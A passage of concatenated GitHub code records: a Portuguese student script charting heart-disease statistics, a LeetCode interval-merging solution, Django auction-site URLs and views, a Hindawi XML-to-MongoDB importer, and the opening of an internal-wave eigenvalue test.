DistribuicaoClasses):\n        keys = dist.classes.keys()\n        for key in keys:\n            classe = dist.classes[key]\n            print(\"[\" + str(classe.l_inf) + \", \" + str(classe.l_sup) + \"] | \" + str(classe.valor[0]) + \" % | \" + str(classe.valor[1]) + \" % | \" + str(classe.valor[2]) + \" %\")\n        print(\"Total | \" + str(dist.total_doenca * 100 / dist.total) + \" % | \" + str(dist.total_n_doenca * 100 / dist.total) + \" % | \" + str(dist.total * 100 / dist.total) + \" %\\n\")\n\n    elif isinstance(dist, DistribuicaoSimples):\n        keys = dist.tabela.keys()\n        for key in keys:\n            valor = dist.tabela[key]\n            print(key + \" | \" + str(valor[0]) + \" % | \" + str(valor[1]) + \" % | \" + str(valor[2]) + \" %\")\n        print(\"Total | \" + str(dados.total_doenca * 100 / dados.total) + \" % | \" + str(dados.total_n_doenca * 100 / dados.total) + \" % | \" + str(dados.total * 100 / dados.total) + \" %\\n\")\n\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n# 7)\n# Specify a program that, when run, displays the tables for the requested distributions;\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n\ndef main():\n\n    print(\"\\nTPC1 - Processamento de Linguagens - 2023\")\n    print(\"Guilherme Martins - a92847 - LEI\")\n\n    dados = read_myheart() # data from the csv\n    #print(\"Finished parsing the data\\n\")\n    \n    dist_sexo = dist_doenca_sexo(dados)\n    dist_etario = dist_doenca_etario(dados)\n    dist_colesterol = dist_doenca_colesterol(dados)\n    #print(\"Finished computing the distributions\\n\")\n\n    sair = 
1\n\n    # Program interface\n    while sair :\n\n        print(\"\\n--------------------\")\n        print(\"| Available options |\")\n        print(\"--------------------\\n\")\n        print(\"1 - Distribution of the disease by sex\")\n        print(\"2 - Distribution of the disease by age group\")\n        print(\"3 - Distribution of the disease by cholesterol level\")\n        print(\"4 - (matplotlib) Distribution of the disease by sex\")\n        print(\"5 - (matplotlib) Distribution of the disease by age group\")\n        print(\"6 - (matplotlib) Distribution of the disease by cholesterol level\")\n        print(\"0 - Exit\")\n        opcao = int(input(\"\\nEnter the desired option: \"))\n        \n        # 1 - Distribution of the disease by sex\n        if opcao == 1:\n            imprimir_distribuicao(dist_sexo, dados)\n        # 2 - Distribution of the disease by age group\n        elif opcao == 2:\n            imprimir_distribuicao(dist_etario, dados)\n        # 3 - Distribution of the disease by cholesterol level\n        elif opcao == 3:\n            imprimir_distribuicao(dist_colesterol, dados)\n        # 4 - (matplotlib) Distribution of the disease by sex\n        elif opcao == 4:\n            graficos_dists(dist_sexo, dados)\n        # 5 - (matplotlib) Distribution of the disease by age group\n        elif opcao == 5:\n            graficos_dists(dist_etario, dados)\n        # 6 - (matplotlib) Distribution of the disease by cholesterol level\n        elif opcao == 6:\n            graficos_dists(dist_colesterol, dados)\n        # 0 - Exit\n        elif opcao == 0: \n            sair = 0\n\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n# 8)\n# Extra: explore the matplotlib module and create charts for your distributions.\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n\ndef graficos_dists(dist, dados):\n\n    # https://matplotlib.org/stable/gallery/lines_bars_and_markers/barchart.html#sphx-glr-gallery-lines-bars-and-markers-barchart-py\n    classes = []\n    colunas = {\"Has Disease\": (), \"No Disease\": (), \"Total\": ()}\n\n    if isinstance(dist, DistribuicaoClasses):\n        keys = dist.classes.keys()\n        # we need to build the string for the keys\n        for (v1,v2) in keys:\n            classe = dist.classes[(v1,v2)]\n            classes.append(\"[\" + str(v1) + \", \" + str(v2) +\"]\")\n            valor = classe.valor\n            colunas[\"Has Disease\"] = colunas[\"Has Disease\"] +(valor[0],)\n            colunas[\"No Disease\"] = colunas[\"No Disease\"] +(valor[1],)\n            colunas[\"Total\"] = colunas[\"Total\"] +(valor[2],)\n    elif isinstance(dist, DistribuicaoSimples):\n        classes = list(dist.tabela.keys())\n        for key in classes:\n            # dist.tabela[key]\n            colunas[\"Has Disease\"] = colunas[\"Has Disease\"] +(dist.tabela[key][0],)\n            colunas[\"No Disease\"] = colunas[\"No Disease\"] +(dist.tabela[key][1],)\n            colunas[\"Total\"] = colunas[\"Total\"] +(dist.tabela[key][2],)\n\n    x = np.arange(len(classes))  # the label locations\n    width = 0.25  # the width of the bars\n    multiplier = 0\n\n    fig, ax = plt.subplots(constrained_layout=True)\n\n    for attribute, measurement in colunas.items():\n        offset = width * multiplier\n        rects = ax.bar(x + offset, measurement, width, label=attribute)\n        ax.bar_label(rects, padding=3)\n        multiplier += 1\n\n    # Add some text for labels, title and custom x-axis tick labels, etc.\n    ax.set_ylabel('Percentage (%)')\n    ax.set_title(dist.titulo)\n    ax.set_xticks(x + width, classes)\n    ax.legend(loc='upper left', ncols=3)\n    if isinstance(dist, DistribuicaoClasses): \n        if dist.var == \"Age\": ax.set_ylim(0, 25)\n        elif dist.var == \"Cholesterol\": ax.set_ylim(0, 10)\n    
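# NOTE: these fixed y-limits are hand-tuned to the percentage ranges the three distributions are expected to produce.\n    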
elif isinstance(dist, DistribuicaoSimples): ax.set_ylim(0, 85)\n\n plt.show()\n\nif __name__ == '__main__':\n main()", "repo_name": "GuiSSMartins/PL2023", "sub_path": "TPC1/tpc1.py", "file_name": "tpc1.py", "file_ext": "py", "file_size_in_byte": 16727, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "math.inf", "line_number": 39, "usage_type": "attribute"}, {"api_name": "math.inf", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 390, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 394, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 394, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 412, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 412, "usage_type": "name"}]} +{"seq_id": "17488266856", "text": "from typing import List\n#create an array for all times. Mark as 1 if it is an interval. In the end, count groups of 1's and return interval\nclass Solution:\n def merge(self, intervals: List[List[int]]) -> List[List[int]]:\n #sl = sorted(intervals,key=lambda x : x[0])\n mn = intervals[0][0]\n mx = intervals[0][1]\n for i in intervals :\n if i[0] < mn :\n mn = i[0]\n if i[1] > mx :\n mx = i[1]\n #print(mn,mx)\n n = mx-mn + 1\n result = []\n l = [0 for i in range(mx+1)]\n for i in intervals :\n start = i[0]\n end = i[1]\n if start == end :\n if l[start] == 1 :\n continue\n else :\n l[start] = 0.5\n # print(start,end)\n for j in range(start,end) :\n l[j]=1\n index = 0\n s = -1\n print (l)\n for i in range(len(l)) :\n if l[i] == 1 and s==-1 :\n s = i\n if l[i] == 0 and s!=-1 :\n result.append([s,i])\n s = -1\n if i == len(l)-1 :\n if l[i] == 1 and s!=-1 :\n result.append([s,i])\n if l[i] == 1 and s == -1 :\n result.append([i,i])\n \n if l[i] == 0.5 and s==-1:\n result.append([i,i])\n if l[i] ==0.5 and s!=-1 :\n result.append([s,i])\n s = -1\n\n return result \n \n\"\"\"\nthis solution involves sorting the input array :\n\nclass Solution:\n def merge(self, intervals: List[List[int]]) -> List[List[int]]:\n intervals.sort()\n result=[]\n for interval in intervals:\n first =interval[0]\n second=interval[1]\n if len(result)== 0 :\n result.append(interval)\n elif result[-1][0] == first:\n result.pop(-1)\n result.append(interval)\n elif first <= result[-1][1]:\n first = result[-1][0]\n second= max(second,result[-1][1])\n result.pop(-1)\n result.append([first,second])\n else:\n result.append(interval)\n return result\n\"\"\" \n ", "repo_name": "shauryasoni/Leetcode", "sub_path": "mergeIntervals.py", "file_name": "mergeIntervals.py", "file_ext": "py", "file_size_in_byte": 2335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "4356940580", "text": "from django.urls import include, path\nfrom .views import *\nfrom .search_view import *\n\nurlpatterns = [\n path('customers/prepaid', PrepaidCustomers.as_view()),\n path('customers/postpaid', PostpaidCustomers.as_view()),\n path('customer/information/basic-information', SingleCustomer.as_view()), \n path('searching/prepaid/customers', SearchPrepaidCustomers.as_view()),\n path('advancedsearching/prepaid/customers', AdvancedSearchPrepaidCustomers.as_view()),\n path('searching/postpaid/customers', SearchPostpaidCustomers.as_view()),\n path('advancedsearching/postpaid/customers', 
AdvancedSearchPostpaidCustomers.as_view()),\n path('singlecustomer/tariffcode', TarrifCode.as_view()),\n \n \n \n \n\n]", "repo_name": "Pybool/cms_ibedc", "sub_path": "django_backend/env/ibedc_cms_backends/customer/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 711, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "71235744486", "text": "from django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required\n\nfrom .models import User, Listings, Bids, Watchlists, Comments, Categories\nfrom django.db.models import Max\nfrom django.contrib import messages\nfrom django.shortcuts import render, redirect\n\n\ndef index(request):\n # Query all listings and related highest price\n listing = Listings.objects.raw(\"SELECT auctions_listings.*, MAX(auctions_bids.bid) AS highest_bid FROM auctions_listings, auctions_bids WHERE auctions_listings.id=auctions_bids.auction_id GROUP BY auctions_bids.auction_id\")\n\n return render(request, \"auctions/index.html\", {\n \"listings\": listing\n })\n\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"auctions/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/register.html\")\n\n@login_required\ndef create(request):\n if request.method == \"POST\":\n listing = Listings()\n listing.title = request.POST.get(\"title\")\n listing.description = request.POST.get(\"description\")\n 
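# The remaining fields are copied straight from the POST data; request.POST.get returns None for any missing field.\n        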
listing.image = request.POST.get(\"image\")\n        listing.starting_bid = request.POST.get(\"starting_bid\")\n        listing.category = Categories.objects.get(pk=request.POST.get(\"category\"))\n        listing.user = request.user\n        listing.save()\n        # Save the starting bid as the first one in the Bids table\n        listing = Listings.objects.get(pk=listing.pk)\n        starting_bid = Bids(auction=listing, bidder=request.user, bid=request.POST.get(\"starting_bid\"))\n        starting_bid.save()\n\n        return HttpResponseRedirect(reverse(\"index\"))\n    else:\n        categories = Categories.objects.all()\n        return render(request, \"auctions/create.html\", {\n            \"categories\": categories\n        })\n\ndef auction(request, listing_pk):\n    listing = Listings.objects.get(pk=listing_pk)\n    highest_bid = Bids.objects.filter(auction_id=listing_pk).aggregate(Max(\"bid\"))['bid__max']\n    # When there are no bids\n    if listing.starting_bid == highest_bid:\n        highest_bid = listing.starting_bid\n        highest_bidder = None \n    # When there is at least one bid \n    else:\n        highest_bidder = Bids.objects.filter(auction_id=listing_pk).annotate(Max('bid')).order_by('-bid').first().bidder\n    # Get the comments on that auction\n    comments = Comments.objects.filter(auction_id=listing_pk).values_list(\"comment\", flat=True)\n    context = {\n        \"title\": listing.title,\n        \"description\": listing.description,\n        \"highest_bid\": highest_bid,\n        \"image\": listing.image,\n        \"listing_pk\": listing_pk,\n        \"listing_user\": listing.user,\n        \"open\": listing.open,\n        \"highest_bidder\": highest_bidder,\n        \"comments\": comments\n    }\n\n    return render(request, \"auctions/listing.html\", context)\n\ndef categories_view(request):\n    categories = Categories.objects.all()\n\n    return render(request, \"auctions/categories.html\", {\n        \"categories\": categories\n    })\n\ndef categories_listings(request, category_pk):\n    listings = Listings.objects.filter(category_id=category_pk)\n    categories = Categories.objects.get(pk=category_pk)\n    category = categories.categories\n\n    return render(request, \"auctions/categories_listings.html\", {\n        \"category\": category,\n        \"listings\": listings\n    })\n\n\n@login_required\ndef bid(request, listing_pk):\n    # get info from database\n    listing = Listings.objects.get(pk=listing_pk)\n    user = request.user\n    try:\n        bid = float(request.POST.get(\"bid\"))\n    except ValueError:\n        messages.success(request, \"You must place a bid\")\n        return redirect(\"listing\", listing_pk=listing_pk)\n    # Update db for Bids model\n    # Check if there is a bid on that auction\n    if Bids.objects.filter(auction_id=listing_pk):\n        highest_bid = Bids.objects.filter(auction_id=listing_pk).aggregate(Max(\"bid\"))['bid__max'] \n        if bid > highest_bid:\n            new_bid = Bids(auction=listing, bidder=user, bid=bid)\n            new_bid.save()\n            messages.success(request, \"Your bid has been saved\")\n        else:\n            messages.success(request, \"Your bid must be higher than the current price\")\n    elif bid > listing.starting_bid: \n        new_bid = Bids(auction=listing, bidder=user, bid=bid)\n        new_bid.save()\n        messages.success(request, \"Your bid has been saved\")\n    else:\n        messages.success(request, \"Your bid must be higher than the current price\")\n\n    return redirect(\"listing\", listing_pk=listing_pk)\n    \n@login_required\ndef watchlist_add(request, listing_pk):\n    watchlist = Watchlists()\n    watchlist.watchlist = True\n    listing = Listings.objects.get(pk=listing_pk)\n    watchlist.auction = listing\n    watchlist.user = request.user\n    watchlist.save()\n\n    return redirect(\"listing\", listing_pk=listing_pk)\n\n@login_required\ndef watchlist_view(request):\n    # 
Extract the listings that are on the watchlist\n    # A raw query in Django returns a lazy RawQuerySet, so the\n    # instances can only be iterated over later, as in 'watchlist.html'\n    listings = Listings.objects.raw('SELECT auctions_listings.id, image, title, auctions_watchlists.id AS watchlist_pk\\\n        FROM auctions_listings, auctions_watchlists WHERE auctions_listings.id=auctions_watchlists.auction_id')\n    return render(request, \"auctions/watchlist.html\", {\n        \"listings\": listings,\n    })\n\n@login_required\ndef watchlist_delete(request, watchlist_pk):\n    Watchlists.objects.filter(pk=watchlist_pk).delete()\n\n    return HttpResponseRedirect(reverse(\"watchlist_view\"))\n\n@login_required\ndef close(request, listing_pk):\n    Listings.objects.filter(pk=listing_pk).update(open=False)\n\n    return HttpResponseRedirect(reverse(\"index\"))\n\n@login_required\ndef comment(request, listing_pk):\n\n    comment = request.POST.get(\"comment\")\n    listing = Listings.objects.get(pk=listing_pk)\n    new_comment = Comments(auction=listing, user=request.user, comment=comment)\n    new_comment.save()\n\n    return redirect(\"listing\", listing_pk=listing_pk)\n", "repo_name": "Bard2803/Web-Development", "sub_path": "commerce/auctions/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7700, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "models.Listings.objects.raw", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 16, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 30, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 34, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 35, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 35, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 41, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 45, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 46, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 46, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 58, "usage_type": "call"}, {"api_name": "models.User.objects.create_user", "line_number": 64, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 64, "usage_type": "name"}, {"api_name": "django.db.IntegrityError", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 70, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 71, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 71, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Listings", "line_number": 78, "usage_type": "call"}, {"api_name": "models.Categories.objects.get", "line_number": 83, "usage_type": "call"}, {"api_name": "models.Categories.objects", "line_number": 83, 
"usage_type": "attribute"}, {"api_name": "models.Categories", "line_number": 83, "usage_type": "name"}, {"api_name": "models.Listings.objects.get", "line_number": 87, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 87, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 87, "usage_type": "name"}, {"api_name": "models.Bids", "line_number": 88, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 91, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 91, "usage_type": "call"}, {"api_name": "models.Categories.objects.all", "line_number": 93, "usage_type": "call"}, {"api_name": "models.Categories.objects", "line_number": 93, "usage_type": "attribute"}, {"api_name": "models.Categories", "line_number": 93, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 94, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 75, "usage_type": "name"}, {"api_name": "models.Listings.objects.get", "line_number": 99, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 99, "usage_type": "name"}, {"api_name": "models.Bids.objects.filter", "line_number": 100, "usage_type": "call"}, {"api_name": "models.Bids.objects", "line_number": 100, "usage_type": "attribute"}, {"api_name": "models.Bids", "line_number": 100, "usage_type": "name"}, {"api_name": "django.db.models.Max", "line_number": 100, "usage_type": "call"}, {"api_name": "models.Bids.objects.filter", "line_number": 107, "usage_type": "call"}, {"api_name": "models.Bids.objects", "line_number": 107, "usage_type": "attribute"}, {"api_name": "models.Bids", "line_number": 107, "usage_type": "name"}, {"api_name": "django.db.models.Max", "line_number": 107, "usage_type": "call"}, {"api_name": "models.Comments.objects.filter", "line_number": 109, "usage_type": "call"}, {"api_name": "models.Comments.objects", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.Comments", "line_number": 109, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 122, "usage_type": "call"}, {"api_name": "models.Categories.objects.all", "line_number": 125, "usage_type": "call"}, {"api_name": "models.Categories.objects", "line_number": 125, "usage_type": "attribute"}, {"api_name": "models.Categories", "line_number": 125, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 127, "usage_type": "call"}, {"api_name": "models.Listings.objects.filter", "line_number": 132, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 132, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 132, "usage_type": "name"}, {"api_name": "models.Categories.objects.get", "line_number": 133, "usage_type": "call"}, {"api_name": "models.Categories.objects", "line_number": 133, "usage_type": "attribute"}, {"api_name": "models.Categories", "line_number": 133, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 136, "usage_type": "call"}, {"api_name": "models.Listings.objects.get", "line_number": 145, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 145, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 145, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 150, "usage_type": "call"}, {"api_name": 
"django.contrib.messages", "line_number": 150, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 151, "usage_type": "call"}, {"api_name": "models.Bids.objects.filter", "line_number": 154, "usage_type": "call"}, {"api_name": "models.Bids.objects", "line_number": 154, "usage_type": "attribute"}, {"api_name": "models.Bids", "line_number": 154, "usage_type": "name"}, {"api_name": "models.Bids.objects.filter", "line_number": 155, "usage_type": "call"}, {"api_name": "models.Bids.objects", "line_number": 155, "usage_type": "attribute"}, {"api_name": "models.Bids", "line_number": 155, "usage_type": "name"}, {"api_name": "django.db.models.Max", "line_number": 155, "usage_type": "call"}, {"api_name": "models.Bids", "line_number": 157, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 159, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 159, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 161, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 161, "usage_type": "name"}, {"api_name": "models.Bids", "line_number": 163, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 165, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 165, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 167, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 167, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 169, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 142, "usage_type": "name"}, {"api_name": "models.Watchlists", "line_number": 173, "usage_type": "call"}, {"api_name": "models.Listings.objects.get", "line_number": 175, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 175, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 175, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 180, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 171, "usage_type": "name"}, {"api_name": "models.Listings.objects.raw", "line_number": 187, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 187, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 187, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 189, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 182, "usage_type": "name"}, {"api_name": "models.Watchlists.objects.filter", "line_number": 195, "usage_type": "call"}, {"api_name": "models.Watchlists.objects", "line_number": 195, "usage_type": "attribute"}, {"api_name": "models.Watchlists", "line_number": 195, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 197, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 197, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 193, "usage_type": "name"}, {"api_name": "models.Listings.objects.filter", "line_number": 201, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 201, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 201, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 
203, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 203, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 199, "usage_type": "name"}, {"api_name": "models.Listings.objects.get", "line_number": 209, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 209, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 209, "usage_type": "name"}, {"api_name": "models.Comments", "line_number": 210, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 213, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 205, "usage_type": "name"}]} +{"seq_id": "21781434408", "text": "import json\nimport xmltodict\nimport os\nrootdir = 'D:\\datasets\\HindawiArticles\\\\2008'\nfrom pymongo import MongoClient\nfrom pymongo.errors import *\n\ndef formArticleBody(body):\n sections=[]\n for section in body['sec']:\n i=0\n single_section={}\n single_section['title']=section['title']\n single_section['content'] = ''\n if 'p' in section:\n for para in section['p']:\n if(isinstance(para,str)):\n single_section['content'] += para\n single_section['content'] += '\\n'\n else:\n if('sec' in para):\n print(\"subsectioni\")\n for subsection in para['sec']:\n for subpara in subsection['p']:\n single_section['content'] += subpara['#text']\n single_section['content'] +='\\n' \n if '#text' in para:\n single_section['content'] += para['#text']\n single_section['content'] +='\\n'\n if 'sec' in section:\n for subsec in section['sec']:\n if 'p' in subsec:\n for subpara2 in subsec['p']:\n if(isinstance(subpara2,str)):\n single_section['content'] += subpara2\n single_section['content'] +='\\n'\n else:\n if '#text' in subpara2:\n single_section['content'] += subpara2['#text']\n \n filename = \"section\"+str(i)+\".json\"\n with open(filename,'w')as output_section_file:\n output_section_file.write(json.dumps(section))\n sections.append(single_section)\n i+=1\n return sections\n \n\nwith open('D:\\\\datasets\\\\HindawiArticles\\\\2008\\\\HINDAWI.AAA\\\\531361-2008-02-24.xml') as xml_file:\n # print(article['body']['sec'][2])\n # exit()\n \n data_dict = xmltodict.parse(xml_file.read())\n json_data = json.dumps(data_dict)\n article = data_dict[\"article\"]\n with open('article.json','w')as article_out_file:\n article_out_file.write(json.dumps(article))\n front = article[\"front\"]\n journalMeta = {\"id\": front[\"journal-meta\"][\"journal-id\"][\"#text\"],\n \"title\": front[\"journal-meta\"][\"journal-title-group\"][\"journal-title\"],\n \"issn\": {\"epub\": front[\"journal-meta\"][\"issn\"][0][\"#text\"], \"ppub\": front[\"journal-meta\"][\"issn\"][0][\"#text\"]},\n \"publisher\": front[\"journal-meta\"][\"publisher\"][\"publisher-name\"]}\n articleMeta = {\n \"id\": front[\"article-meta\"][\"article-id\"][2][\"#text\"],\n \"categories\":front[\"article-meta\"][\"article-categories\"][\"subj-group\"][\"subject\"],\n \"title\":front[\"article-meta\"][\"title-group\"][\"article-title\"],\n \"contributors\":[{\"name\": author[\"name\"][\"surname\"]+author[\"name\"][\"given-names\"],\"type\":author[\"@contrib-type\"],\"id\":author[\"@id\"]} for author in front[\"article-meta\"][\"contrib-group\"][\"contrib\"] ],\n \"published\":front[\"article-meta\"][\"pub-date\"],\n \"history\":[{\"type\":recType[\"@date-type\"],\"date\":recType[\"day\"]+\"/\"+recType[\"month\"]+\"/\"+recType[\"year\"]} for recType in front[\"article-meta\"][\"history\"][\"date\"]],\n 
\"permission\":{\"year\":front[\"article-meta\"][\"permissions\"][\"copyright-year\"],\"holder\":front[\"article-meta\"][\"permissions\"][\"copyright-holder\"],\"license\":front[\"article-meta\"][\"permissions\"][\"license\"][\"license-p\"]},\n \"abstract\":front[\"article-meta\"][\"abstract\"][\"p\"],\n \"reference-counts\":front[\"article-meta\"][\"counts\"][\"ref-count\"][\"@count\"],\n \"page-count\":front[\"article-meta\"][\"counts\"][\"page-count\"]['@count'],\n \"body\":formArticleBody(article['body']),\n \"affiliations\":front[\"article-meta\"][\"aff\"]\n }\n # with open('D:\\python_project\\games2\\src\\db_scripts\\hindwai\\json_file\\\\full_article.json','w') as output_json_file:\n # output_json_file.write(json.dumps(articleMeta))\n journal = {\"journalMeta\":journalMeta,\"article\":articleMeta}\n # Write data to mongodbb:\n try:\n client = MongoClient('localhost', 27017)\n except ConnectionFailure:\n print(\"Server not available\")\n\n\n db = client['hindwai']\n collection = db['journals']\n # insert the document\n try:\n result = collection.insert_one(journal)\n print(\"Insertion done ...\",result.inserted_id)\n except OperationFailure as OperationFailureError:\n print(\"OperationFailureError error\",OperationFailureError)\n except ExecutionTimeout as ExecutionTimeoutError:\n print(\"ExecutionTimeoutError error\",ExecutionTimeoutError)\n except WriteError as WriteErrorError:\n print(\"WriteErrorError error\",WriteErrorError)\n\n\n \n", "repo_name": "sunapusiddharth/flask-test", "sub_path": "src/db_scripts/hindwai/tryxmltojson.py", "file_name": "tryxmltojson.py", "file_ext": "py", "file_size_in_byte": 4734, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.dumps", "line_number": 43, "usage_type": "call"}, {"api_name": "xmltodict.parse", "line_number": 53, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 54, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 57, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "30237449404", "text": "\"\"\"\nTest the eigenvalue solver\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import linalg, interpolate, sparse\n\nfrom iwaves.utils import imodes as iwaves\nfrom time import time\nimport pdb\n\ndef iwave_modes(N2, dz, k=None):\n \"\"\"\n Calculates the eigenvalues and eigenfunctions to the internal wave eigenvalue problem:\n \n $$\n \\left[ \\frac{d^2}{dz^2} - \\frac{1}{c_0} \\bar{\\rho}_z \\right] \\phi = 0\n $$\n \n with boundary conditions \n \"\"\"\n\n nz = N2.shape[0] # Remove the surface values\n dz2 = 1/dz**2\n\n # Construct the LHS matrix, A\n A = np.diag(-1*dz2*np.ones((nz-1)),-1) + \\\n np.diag(2*dz2*np.ones((nz,)),0) + \\\n 